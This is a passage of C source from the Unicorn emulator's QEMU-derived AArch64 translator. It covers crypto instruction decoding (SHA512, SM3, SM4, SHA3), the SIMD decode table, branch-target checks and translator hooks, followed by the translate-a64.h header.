case 1: /* SHA512H2 */ feature = dc_isar_feature(aa64_sha512, s); genfn = gen_helper_crypto_sha512h2; break; case 2: /* SHA512SU1 */ feature = dc_isar_feature(aa64_sha512, s); genfn = gen_helper_crypto_sha512su1; break; case 3: /* RAX1 */ feature = dc_isar_feature(aa64_sha3, s); genfn = NULL; break; default: g_assert_not_reached(); } } else { switch (opcode) { case 0: /* SM3PARTW1 */ feature = dc_isar_feature(aa64_sm3, s); genfn = gen_helper_crypto_sm3partw1; break; case 1: /* SM3PARTW2 */ feature = dc_isar_feature(aa64_sm3, s); genfn = gen_helper_crypto_sm3partw2; break; case 2: /* SM4EKEY */ feature = dc_isar_feature(aa64_sm4, s); genfn = gen_helper_crypto_sm4ekey; break; default: unallocated_encoding(s); return; } } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (genfn) { TCGv_ptr tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr; tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); tcg_rm_ptr = vec_full_reg_ptr(s, rm); genfn(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rm_ptr); } else { TCGv_i64 tcg_op1, tcg_op2, tcg_res[2]; int pass; tcg_op1 = tcg_temp_new_i64(tcg_ctx); tcg_op2 = tcg_temp_new_i64(tcg_ctx); tcg_res[0] = tcg_temp_new_i64(tcg_ctx); tcg_res[1] = tcg_temp_new_i64(tcg_ctx); for (pass = 0; pass < 2; pass++) { read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); tcg_gen_rotli_i64(tcg_ctx, tcg_res[pass], tcg_op2, 1); tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); } write_vec_element(s, tcg_res[0], rd, 0, MO_64); write_vec_element(s, tcg_res[1], rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res[0]); tcg_temp_free_i64(tcg_ctx, tcg_res[1]); } } /* Crypto two-reg SHA512 * 31 12 11 10 9 5 4 0 * +-----------------------------------------+--------+------+------+ * | 1 1 0 0 1 1 1 0 1 1 0 0 0 0 0 0 1 0 0 0 | opcode | Rn | Rd | * +-----------------------------------------+--------+------+------+ */ static void disas_crypto_two_reg_sha512(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opcode = extract32(insn, 10, 2); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); TCGv_ptr tcg_rd_ptr, tcg_rn_ptr; bool feature; CryptoTwoOpFn *genfn; switch (opcode) { case 0: /* SHA512SU0 */ feature = dc_isar_feature(aa64_sha512, s); genfn = gen_helper_crypto_sha512su0; break; case 1: /* SM4E */ feature = dc_isar_feature(aa64_sm4, s); genfn = gen_helper_crypto_sm4e; break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); genfn(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); } /* Crypto four-register * 31 23 22 21 20 16 15 14 10 9 5 4 0 * +-------------------+-----+------+---+------+------+------+ * | 1 1 0 0 1 1 1 0 0 | Op0 | Rm | 0 | Ra | Rn | Rd | * +-------------------+-----+------+---+------+------+------+ */ static void disas_crypto_four_reg(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op0 = extract32(insn, 21, 2); int rm = extract32(insn, 16, 5); int ra = extract32(insn, 10, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); bool feature; switch (op0) { case 0: /* EOR3 */ case 1: /* BCAX */ 
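/* As implemented below: EOR3 computes Rd = Rn ^ Rm ^ Ra, and
 * BCAX computes Rd = Rn ^ (Rm & ~Ra).
 */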
feature = dc_isar_feature(aa64_sha3, s); break; case 2: /* SM3SS1 */ feature = dc_isar_feature(aa64_sm3, s); break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (op0 < 2) { TCGv_i64 tcg_op1, tcg_op2, tcg_op3, tcg_res[2]; int pass; tcg_op1 = tcg_temp_new_i64(tcg_ctx); tcg_op2 = tcg_temp_new_i64(tcg_ctx); tcg_op3 = tcg_temp_new_i64(tcg_ctx); tcg_res[0] = tcg_temp_new_i64(tcg_ctx); tcg_res[1] = tcg_temp_new_i64(tcg_ctx); for (pass = 0; pass < 2; pass++) { read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); read_vec_element(s, tcg_op3, ra, pass, MO_64); if (op0 == 0) { /* EOR3 */ tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_op2, tcg_op3); } else { /* BCAX */ tcg_gen_andc_i64(tcg_ctx, tcg_res[pass], tcg_op2, tcg_op3); } tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); } write_vec_element(s, tcg_res[0], rd, 0, MO_64); write_vec_element(s, tcg_res[1], rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_op3); tcg_temp_free_i64(tcg_ctx, tcg_res[0]); tcg_temp_free_i64(tcg_ctx, tcg_res[1]); } else { TCGv_i32 tcg_op1, tcg_op2, tcg_op3, tcg_res, tcg_zero; tcg_op1 = tcg_temp_new_i32(tcg_ctx); tcg_op2 = tcg_temp_new_i32(tcg_ctx); tcg_op3 = tcg_temp_new_i32(tcg_ctx); tcg_res = tcg_temp_new_i32(tcg_ctx); tcg_zero = tcg_const_i32(tcg_ctx, 0); read_vec_element_i32(s, tcg_op1, rn, 3, MO_32); read_vec_element_i32(s, tcg_op2, rm, 3, MO_32); read_vec_element_i32(s, tcg_op3, ra, 3, MO_32); tcg_gen_rotri_i32(tcg_ctx, tcg_res, tcg_op1, 20); tcg_gen_add_i32(tcg_ctx, tcg_res, tcg_res, tcg_op2); tcg_gen_add_i32(tcg_ctx, tcg_res, tcg_res, tcg_op3); tcg_gen_rotri_i32(tcg_ctx, tcg_res, tcg_res, 25); write_vec_element_i32(s, tcg_zero, rd, 0, MO_32); write_vec_element_i32(s, tcg_zero, rd, 1, MO_32); write_vec_element_i32(s, tcg_zero, rd, 2, MO_32); write_vec_element_i32(s, tcg_res, rd, 3, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_op3); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_zero); } } /* Crypto XAR * 31 21 20 16 15 10 9 5 4 0 * +-----------------------+------+--------+------+------+ * | 1 1 0 0 1 1 1 0 1 0 0 | Rm | imm6 | Rn | Rd | * +-----------------------+------+--------+------+------+ */ static void disas_crypto_xar(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rm = extract32(insn, 16, 5); int imm6 = extract32(insn, 10, 6); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); TCGv_i64 tcg_op1, tcg_op2, tcg_res[2]; int pass; if (!dc_isar_feature(aa64_sha3, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_op1 = tcg_temp_new_i64(tcg_ctx); tcg_op2 = tcg_temp_new_i64(tcg_ctx); tcg_res[0] = tcg_temp_new_i64(tcg_ctx); tcg_res[1] = tcg_temp_new_i64(tcg_ctx); for (pass = 0; pass < 2; pass++) { read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); tcg_gen_rotri_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], imm6); } write_vec_element(s, tcg_res[0], rd, 0, MO_64); write_vec_element(s, tcg_res[1], rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res[0]); tcg_temp_free_i64(tcg_ctx, tcg_res[1]); } /* Crypto three-reg imm2 * 31 21 20 16 15 14 13 12 11 10 9 5 4 0 * 
+-----------------------+------+-----+------+--------+------+------+ * | 1 1 0 0 1 1 1 0 0 1 0 | Rm | 1 0 | imm2 | opcode | Rn | Rd | * +-----------------------+------+-----+------+--------+------+------+ */ static void disas_crypto_three_reg_imm2(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opcode = extract32(insn, 10, 2); int imm2 = extract32(insn, 12, 2); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); TCGv_ptr tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr; TCGv_i32 tcg_imm2, tcg_opcode; if (!dc_isar_feature(aa64_sm3, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); tcg_rm_ptr = vec_full_reg_ptr(s, rm); tcg_imm2 = tcg_const_i32(tcg_ctx, imm2); tcg_opcode = tcg_const_i32(tcg_ctx, opcode); gen_helper_crypto_sm3tt(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr, tcg_imm2, tcg_opcode); tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rm_ptr); tcg_temp_free_i32(tcg_ctx, tcg_imm2); tcg_temp_free_i32(tcg_ctx, tcg_opcode); } /* C3.6 Data processing - SIMD, inc Crypto * * As the decode gets a little complex we are using a table based * approach for this part of the decode. */ static const AArch64DecodeTable data_proc_simd[] = { /* pattern , mask , fn */ { 0x0e200400, 0x9f200400, disas_simd_three_reg_same }, { 0x0e008400, 0x9f208400, disas_simd_three_reg_same_extra }, { 0x0e200000, 0x9f200c00, disas_simd_three_reg_diff }, { 0x0e200800, 0x9f3e0c00, disas_simd_two_reg_misc }, { 0x0e300800, 0x9f3e0c00, disas_simd_across_lanes }, { 0x0e000400, 0x9fe08400, disas_simd_copy }, { 0x0f000000, 0x9f000400, disas_simd_indexed }, /* vector indexed */ /* simd_mod_imm decode is a subset of simd_shift_imm, so must precede it */ { 0x0f000400, 0x9ff80400, disas_simd_mod_imm }, { 0x0f000400, 0x9f800400, disas_simd_shift_imm }, { 0x0e000000, 0xbf208c00, disas_simd_tb }, { 0x0e000800, 0xbf208c00, disas_simd_zip_trn }, { 0x2e000000, 0xbf208400, disas_simd_ext }, { 0x5e200400, 0xdf200400, disas_simd_scalar_three_reg_same }, { 0x5e008400, 0xdf208400, disas_simd_scalar_three_reg_same_extra }, { 0x5e200000, 0xdf200c00, disas_simd_scalar_three_reg_diff }, { 0x5e200800, 0xdf3e0c00, disas_simd_scalar_two_reg_misc }, { 0x5e300800, 0xdf3e0c00, disas_simd_scalar_pairwise }, { 0x5e000400, 0xdfe08400, disas_simd_scalar_copy }, { 0x5f000000, 0xdf000400, disas_simd_indexed }, /* scalar indexed */ { 0x5f000400, 0xdf800400, disas_simd_scalar_shift_imm }, { 0x4e280800, 0xff3e0c00, disas_crypto_aes }, { 0x5e000000, 0xff208c00, disas_crypto_three_reg_sha }, { 0x5e280800, 0xff3e0c00, disas_crypto_two_reg_sha }, { 0xce608000, 0xffe0b000, disas_crypto_three_reg_sha512 }, { 0xcec08000, 0xfffff000, disas_crypto_two_reg_sha512 }, { 0xce000000, 0xff808000, disas_crypto_four_reg }, { 0xce800000, 0xffe00000, disas_crypto_xar }, { 0xce408000, 0xffe0c000, disas_crypto_three_reg_imm2 }, { 0x0e400400, 0x9f60c400, disas_simd_three_reg_same_fp16 }, { 0x0e780800, 0x8f7e0c00, disas_simd_two_reg_misc_fp16 }, { 0x5e400400, 0xdf60c400, disas_simd_scalar_three_reg_same_fp16 }, { 0x00000000, 0x00000000, NULL } }; static void disas_data_proc_simd(DisasContext *s, uint32_t insn) { /* Note that this is called with all non-FP cases from * table C3-6 so it must UNDEF for entries not specifically * allocated to instructions in that table. 
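 *
 * Each row is matched as:
 *
 *     if ((insn & tp->mask) == tp->pattern) { fn = tp->disas_fn; }
 *
 * For instance, AESE V0.16B, V0.16B encodes as 0x4e284800, and
 * 0x4e284800 & 0xff3e0c00 == 0x4e280800, which selects
 * disas_crypto_aes; an insn matching no row reaches the all-zero
 * terminator and is rejected via unallocated_encoding() below.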
*/ AArch64DecodeFn *fn = lookup_disas_fn(&data_proc_simd[0], insn); if (fn) { fn(s, insn); } else { unallocated_encoding(s); } } /* C3.6 Data processing - SIMD and floating point */ static void disas_data_proc_simd_fp(DisasContext *s, uint32_t insn) { if (extract32(insn, 28, 1) == 1 && extract32(insn, 30, 1) == 0) { disas_data_proc_fp(s, insn); } else { /* SIMD, including crypto */ disas_data_proc_simd(s, insn); } } /** * is_guarded_page: * @env: The cpu environment * @s: The DisasContext * * Return true if the page is guarded. */ static bool is_guarded_page(CPUARMState *env, DisasContext *s) { uint64_t addr = s->base.pc_first; int mmu_idx = arm_to_core_mmu_idx(s->mmu_idx); unsigned int index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); /* * We test this immediately after reading an insn, which means * that any normal page must be in the TLB. The only exception * would be for executing from flash or device memory, which * does not retain the TLB entry. * * FIXME: Assume false for those, for now. We could use * arm_cpu_get_phys_page_attrs_debug to re-read the page * table entry even for that case. */ return (tlb_hit(s->uc, entry->addr_code, addr) && env_tlb(env)->d[mmu_idx].iotlb[index].attrs.target_tlb_bit0); } /** * btype_destination_ok: * @insn: The instruction at the branch destination * @bt: SCTLR_ELx.BT * @btype: PSTATE.BTYPE, and is non-zero * * On a guarded page, there are a limited number of insns * that may be present at the branch target: * - branch target identifiers, * - paciasp, pacibsp, * - BRK insn * - HLT insn * Anything else causes a Branch Target Exception. * * Return true if the branch is compatible, false to raise BTITRAP. */ static bool btype_destination_ok(uint32_t insn, bool bt, int btype) { if ((insn & 0xfffff01fu) == 0xd503201fu) { /* HINT space */ switch (extract32(insn, 5, 7)) { case 0x19: // 0b011001: /* PACIASP */ case 0x1b: // 0b011011: /* PACIBSP */ /* * If SCTLR_ELx.BT, then PACI*SP are not compatible * with btype == 3. Otherwise all btype are ok. */ return !bt || btype != 3; case 0x20: // 0b100000: /* BTI */ /* Not compatible with any btype. */ return false; case 0x22: // 0b100010: /* BTI c */ /* Not compatible with btype == 3 */ return btype != 3; case 0x24: // 0b100100: /* BTI j */ /* Not compatible with btype == 2 */ return btype != 2; case 0x26: // 0b100110: /* BTI jc */ /* Compatible with any btype. */ return true; } } else { switch (insn & 0xffe0001fu) { case 0xd4200000u: /* BRK */ case 0xd4400000u: /* HLT */ /* Give priority to the breakpoint exception. */ return true; } } return false; } /* C3.1 A64 instruction index by encoding */ static void disas_a64_insn(CPUARMState *env, DisasContext *s) { uint32_t insn; s->pc_curr = s->base.pc_next; insn = arm_ldl_code(env, s->base.pc_next, s->sctlr_b); s->insn = insn; s->base.pc_next += 4; // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, s->pc_curr)) { // Sync PC in advance TCGContext *tcg_ctx = env->uc->tcg_ctx; gen_a64_set_pc_im(tcg_ctx, s->pc_curr); gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, env->uc, s->pc_curr); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } s->fp_access_checked = false; if (dc_isar_feature(aa64_bti, s)) { if (s->base.num_insns == 1) { /* * At the first insn of the TB, compute s->guarded_page. * We delayed computing this until successfully reading * the first insn of the TB, above. 
This (mostly) ensures * that the softmmu tlb entry has been populated, and the * page table GP bit is available. * * Note that we need to compute this even if btype == 0, * because this value is used for BR instructions later * where ENV is not available. */ s->guarded_page = is_guarded_page(env, s); /* First insn can have btype set to non-zero. */ tcg_debug_assert(s->btype >= 0); /* * Note that the Branch Target Exception has fairly high * priority -- below debugging exceptions but above most * everything else. This allows us to handle this now * instead of waiting until the insn is otherwise decoded. */ if (s->btype != 0 && s->guarded_page && !btype_destination_ok(insn, s->bt, s->btype)) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_btitrap(s->btype), default_exception_el(s)); return; } } else { /* Not the first insn: btype must be 0. */ tcg_debug_assert(s->btype == 0); } } switch (extract32(insn, 25, 4)) { case 0x0: case 0x1: case 0x3: /* UNALLOCATED */ unallocated_encoding(s); break; case 0x2: if (!dc_isar_feature(aa64_sve, s) || !disas_sve(s, insn)) { unallocated_encoding(s); } break; case 0x8: case 0x9: /* Data processing - immediate */ disas_data_proc_imm(s, insn); break; case 0xa: case 0xb: /* Branch, exception generation and system insns */ disas_b_exc_sys(s, insn); break; case 0x4: case 0x6: case 0xc: case 0xe: /* Loads and stores */ disas_ldst(s, insn); break; case 0x5: case 0xd: /* Data processing - register */ disas_data_proc_reg(s, insn); break; case 0x7: case 0xf: /* Data processing - SIMD and floating point */ disas_data_proc_simd_fp(s, insn); break; default: assert(FALSE); /* all 15 cases should be handled above */ break; } /* if we allocated any temporaries, free them here */ free_tmp_a64(s); /* * After execution of most insns, btype is reset to 0. * Note that we set btype == -1 when the insn sets btype. */ if (s->btype > 0 && s->base.is_jmp != DISAS_NORETURN) { reset_btype(s); } } static void aarch64_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = cpu->uc; CPUARMState *env = cpu->env_ptr; ARMCPU *arm_cpu = env_archcpu(env); uint32_t tb_flags = dc->base.tb->flags; int bound, core_mmu_idx; // unicorn handle dc->uc = uc; dc->isar = &arm_cpu->isar; dc->condjmp = 0; dc->aarch64 = 1; /* If we are coming from secure EL0 in a system with a 32-bit EL3, then * there is no secure EL1, so we route exceptions to EL3. */ dc->secure_routed_to_el3 = arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3); dc->thumb = 0; dc->sctlr_b = 0; dc->be_data = FIELD_EX32(tb_flags, TBFLAG_ANY, BE_DATA) ? MO_BE : MO_LE; dc->condexec_mask = 0; dc->condexec_cond = 0; core_mmu_idx = FIELD_EX32(tb_flags, TBFLAG_ANY, MMUIDX); dc->mmu_idx = core_to_aa64_mmu_idx(core_mmu_idx); dc->tbii = FIELD_EX32(tb_flags, TBFLAG_A64, TBII); dc->tbid = FIELD_EX32(tb_flags, TBFLAG_A64, TBID); dc->current_el = arm_mmu_idx_to_el(dc->mmu_idx); dc->user = (dc->current_el == 0); dc->fp_excp_el = FIELD_EX32(tb_flags, TBFLAG_ANY, FPEXC_EL); dc->sve_excp_el = FIELD_EX32(tb_flags, TBFLAG_A64, SVEEXC_EL); dc->sve_len = (FIELD_EX32(tb_flags, TBFLAG_A64, ZCR_LEN) + 1) * 16; dc->pauth_active = FIELD_EX32(tb_flags, TBFLAG_A64, PAUTH_ACTIVE); dc->bt = FIELD_EX32(tb_flags, TBFLAG_A64, BT); dc->btype = FIELD_EX32(tb_flags, TBFLAG_A64, BTYPE); dc->unpriv = FIELD_EX32(tb_flags, TBFLAG_A64, UNPRIV); dc->vec_len = 0; dc->vec_stride = 0; dc->cp_regs = arm_cpu->cp_regs; dc->features = env->features; /* Single step state. 
The code-generation logic here is: * SS_ACTIVE == 0: * generate code with no special handling for single-stepping (except * that anything that can make us go to SS_ACTIVE == 1 must end the TB; * this happens anyway because those changes are all system register or * PSTATE writes). * SS_ACTIVE == 1, PSTATE.SS == 1: (active-not-pending) * emit code for one insn * emit code to clear PSTATE.SS * emit code to generate software step exception for completed step * end TB (as usual for having generated an exception) * SS_ACTIVE == 1, PSTATE.SS == 0: (active-pending) * emit code to generate a software step exception * end the TB */ dc->ss_active = FIELD_EX32(tb_flags, TBFLAG_ANY, SS_ACTIVE); dc->pstate_ss = FIELD_EX32(tb_flags, TBFLAG_ANY, PSTATE_SS); dc->is_ldex = false; dc->debug_target_el = FIELD_EX32(tb_flags, TBFLAG_ANY, DEBUG_TARGET_EL); /* Bound the number of insns to execute to those left on the page. */ #ifdef _MSC_VER bound = (0 - (dc->base.pc_first | TARGET_PAGE_MASK)) / 4; #else bound = -(dc->base.pc_first | TARGET_PAGE_MASK) / 4; #endif /* If architectural single step active, limit to 1. */ if (dc->ss_active) { bound = 1; } dc->base.max_insns = MIN(dc->base.max_insns, bound); init_tmp_a64_array(dc); } static void aarch64_tr_tb_start(DisasContextBase *db, CPUState *cpu) { } static void aarch64_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, 0, 0); dc->insn_start = tcg_last_op(tcg_ctx); } static bool aarch64_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cpu, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (bp->flags & BP_CPU) { gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); gen_helper_check_breakpoints(tcg_ctx, tcg_ctx->cpu_env); /* End the TB early; it likely won't be executed */ dc->base.is_jmp = DISAS_TOO_MANY; } else { gen_exception_internal_insn(dc, dc->base.pc_next, EXCP_DEBUG); /* The address covered by the breakpoint must be included in [tb->pc, tb->pc + tb->size) in order for it to be properly cleared -- thus we increment the PC here so that the logic setting tb->size below does the right thing. */ dc->base.pc_next += 4; dc->base.is_jmp = DISAS_NORETURN; } return true; } static void aarch64_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); CPUARMState *env = cpu->env_ptr; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(dc->uc, dcbase->pc_next)) { // imitate WFI instruction to halt emulation dcbase->is_jmp = DISAS_WFI; } else { if (dc->ss_active && !dc->pstate_ss) { /* Singlestep state is Active-pending. * If we're in this state at the start of a TB then either * a) we just took an exception to an EL which is being debugged * and this is the first insn in the exception handler * b) debug exceptions were masked and we just unmasked them * without changing EL (eg by clearing PSTATE.D) * In either case we're going to take a swstep exception in the * "did not step an insn" case, and so the syndrome ISV and EX * bits should be zero.
*/ assert(dc->base.num_insns == 1); gen_swstep_exception(dc, 0, 0); dc->base.is_jmp = DISAS_NORETURN; } else { disas_a64_insn(env, dc); } translator_loop_temp_check(&dc->base); } } static void aarch64_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (unlikely(dc->base.singlestep_enabled || dc->ss_active)) { /* Note that this means single stepping WFI doesn't halt the CPU. * For conditional branch insns this is harmless unreachable code as * gen_goto_tb() has already handled emitting the debug exception * (and thus a tb-jump is not possible when singlestepping). */ switch (dc->base.is_jmp) { default: gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); /* fall through */ case DISAS_EXIT: case DISAS_JUMP: if (dc->base.singlestep_enabled) { gen_exception_internal(tcg_ctx, EXCP_DEBUG); } else { gen_step_complete_exception(dc); } break; case DISAS_NORETURN: break; } } else { switch (dc->base.is_jmp) { case DISAS_NEXT: case DISAS_TOO_MANY: gen_goto_tb(dc, 1, dc->base.pc_next); break; default: case DISAS_UPDATE: gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); /* fall through */ case DISAS_EXIT: tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; case DISAS_JUMP: tcg_gen_lookup_and_goto_ptr(tcg_ctx); break; case DISAS_NORETURN: case DISAS_SWI: break; case DISAS_WFE: gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); gen_helper_wfe(tcg_ctx, tcg_ctx->cpu_env); break; case DISAS_YIELD: gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); gen_helper_yield(tcg_ctx, tcg_ctx->cpu_env); break; case DISAS_WFI: { /* This is a special case because we don't want to just halt the CPU * if trying to debug across a WFI. */ TCGv_i32 tmp = tcg_const_i32(tcg_ctx, 4); gen_a64_set_pc_im(tcg_ctx, dc->base.pc_next); gen_helper_wfi(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); /* The helper doesn't necessarily throw an exception, but we * must go back to the main loop to check for interrupts anyway. */ tcg_gen_exit_tb(tcg_ctx, NULL, 0); break; } } } } const TranslatorOps aarch64_translator_ops = { .init_disas_context = aarch64_tr_init_disas_context, .tb_start = aarch64_tr_tb_start, .insn_start = aarch64_tr_insn_start, .breakpoint_check = aarch64_tr_breakpoint_check, .translate_insn = aarch64_tr_translate_insn, .tb_stop = aarch64_tr_tb_stop, };

unicorn-2.1.1/qemu/target/arm/translate-a64.h

/* * AArch64 translation, common definitions. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version.
* * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef TARGET_ARM_TRANSLATE_A64_H #define TARGET_ARM_TRANSLATE_A64_H void unallocated_encoding(DisasContext *s); typedef struct TCGContext TCGContext; #define unsupported_encoding(s, insn) \ do { \ qemu_log_mask(LOG_UNIMP, \ "%s:%d: unsupported instruction encoding 0x%08x " \ "at pc=%016" PRIx64 "\n", \ __FILE__, __LINE__, insn, s->pc_curr); \ unallocated_encoding(s); \ } while (0) TCGv_i64 new_tmp_a64(DisasContext *s); TCGv_i64 new_tmp_a64_zero(DisasContext *s); TCGv_i64 cpu_reg(DisasContext *s, int reg); TCGv_i64 cpu_reg_sp(DisasContext *s, int reg); TCGv_i64 read_cpu_reg(DisasContext *s, int reg, int sf); TCGv_i64 read_cpu_reg_sp(DisasContext *s, int reg, int sf); void write_fp_dreg(DisasContext *s, int reg, TCGv_i64 v); TCGv_ptr get_fpstatus_ptr(TCGContext *tcg_ctx, bool); bool logic_imm_decode_wmask(uint64_t *result, unsigned int immn, unsigned int imms, unsigned int immr); bool sve_access_check(DisasContext *s); /* We should have at some point before trying to access an FP register * done the necessary access check, so assert that * (a) we did the check and * (b) we didn't then just plough ahead anyway if it failed. * Print the instruction pattern in the abort message so we can figure * out what we need to fix if a user encounters this problem in the wild. */ static inline void assert_fp_access_checked(DisasContext *s) { #ifdef CONFIG_DEBUG_TCG if (unlikely(!s->fp_access_checked || s->fp_excp_el)) { fprintf(stderr, "target-arm: FP access check missing for " "instruction 0x%08x\n", s->insn); abort(); } #endif } /* Return the offset into CPUARMState of an element of specified * size, 'element' places in from the least significant end of * the FP/vector register Qn. */ static inline int vec_reg_offset(DisasContext *s, int regno, int element, MemOp size) { int element_size = 1 << size; int offs = element * element_size; #ifdef HOST_WORDS_BIGENDIAN /* This is complicated slightly because vfp.zregs[n].d[0] is * still the lowest and vfp.zregs[n].d[15] the highest of the * 256 byte vector, even on big endian systems. * * Calculate the offset assuming fully little-endian, * then XOR to account for the order of the 8-byte units. * * For 16 byte elements, the two 8 byte halves will not form a * host int128 if the host is bigendian, since they're in the * wrong order. However the only 16 byte operation we have is * a move, so we can ignore this for the moment. More complicated * operations will have to special case loading and storing from * the zregs array. */ if (element_size < 8) { offs ^= 8 - element_size; } #endif offs += offsetof(CPUARMState, vfp.zregs[regno]); assert_fp_access_checked(s); return offs; } /* Return the offset into CPUARMState of the "whole" vector register Qn. */ static inline int vec_full_reg_offset(DisasContext *s, int regno) { assert_fp_access_checked(s); return offsetof(CPUARMState, vfp.zregs[regno]); } /* Return a newly allocated pointer to the vector register.
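 * The returned TCGv_ptr is a fresh temporary pointing at
 * &env->vfp.zregs[regno]; the caller must release it with
 * tcg_temp_free_ptr(), as the crypto disassembly routines in
 * translate-a64.c do.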
*/ static inline TCGv_ptr vec_full_reg_ptr(DisasContext *s, int regno) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr ret = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, ret, tcg_ctx->cpu_env, vec_full_reg_offset(s, regno)); return ret; } /* Return the byte size of the "whole" vector register, VL / 8. */ static inline int vec_full_reg_size(DisasContext *s) { return s->sve_len; } bool disas_sve(DisasContext *, uint32_t); /* Note that the gvec expanders operate on offsets + sizes. */ typedef void GVecGen2Fn(TCGContext *, unsigned, uint32_t, uint32_t, uint32_t, uint32_t); typedef void GVecGen2iFn(TCGContext *, unsigned, uint32_t, uint32_t, int64_t, uint32_t, uint32_t); typedef void GVecGen3Fn(TCGContext *, unsigned, uint32_t, uint32_t, uint32_t, uint32_t, uint32_t); typedef void GVecGen4Fn(TCGContext *, unsigned, uint32_t, uint32_t, uint32_t, uint32_t, uint32_t, uint32_t); #endif /* 